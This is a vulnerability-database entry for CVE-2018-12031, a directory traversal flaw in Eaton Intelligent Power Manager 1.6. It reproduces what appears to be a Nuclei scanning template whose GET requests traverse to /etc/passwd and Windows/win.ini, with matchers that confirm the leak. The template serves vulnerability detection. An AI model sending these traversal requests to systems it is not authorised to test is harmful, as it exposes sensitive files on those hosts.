Vulners
Lucene search
Eaton Intelligent Power Manager 1.6 - Directory Traversal
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2018-12031 | 12 Jan 202500:00 | – | circl |
 | Eaton Intelligent Power Manager File Containment Vulnerability | 12 Jun 201800:00 | – | cnvd |
 | CVE-2018-12031 | 7 Jun 201816:00 | – | cve |
 | CVE-2018-12031 | 7 Jun 201816:00 | – | cvelist |
 | Eaton Intelligent Power Manager 1.6 - Directory Traversal | 22 Jun 202000:00 | – | exploitdb |
 | CVE-2018-12031 | 7 Jun 201816:29 | – | nvd |
 | CVE-2018-12031 | 7 Jun 201816:29 | – | osv |
 | Directory traversal | 7 Jun 201816:29 | – | prion |
 | CVE-2018-12031 | 9 Jan 202612:25 | – | redhatcve |
 | VulnCheck KEV: CVE-2018-12031 | 26 Nov 202300:00 | – | vulncheck_kev |
10
id: CVE-2018-12031
info:
name: Eaton Intelligent Power Manager 1.6 - Directory Traversal
author: daffainfo
severity: critical
description: Eaton Intelligent Power Manager v1.6 allows an attacker to include a file via directory traversal, which can lead to sensitive information disclosure, denial of service and code execution.
impact: |
An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system.
remediation: |
Apply the latest security patch or upgrade to a newer version of Eaton Intelligent Power Manager to mitigate this vulnerability.
reference:
- https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion
- https://www.exploit-db.com/exploits/48614
- https://nvd.nist.gov/vuln/detail/CVE-2018-12031
- https://github.com/0xT11/CVE-POC
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-12031
cwe-id: CWE-22
epss-score: 0.17313
epss-percentile: 0.96718
cpe: cpe:2.3:a:eaton:intelligent_power_manager:1.6:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: eaton
product: intelligent_power_manager
tags: cve,cve2018,edb,lfi,eaton,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd"
- "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
- type: status
status:
- 200
# digest: 490a0046304402202819e853254bd5bd210606a7068b6e0fca2498033351b79432b11d01f431664402203ed0c3837569c39d1df1d4461bd1532fcf62aae05059af90da05038b5bba2425:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
8.5High risk
Vulners AI Score8.5
CVSS 27.5
CVSS 39.8
EPSS0.17313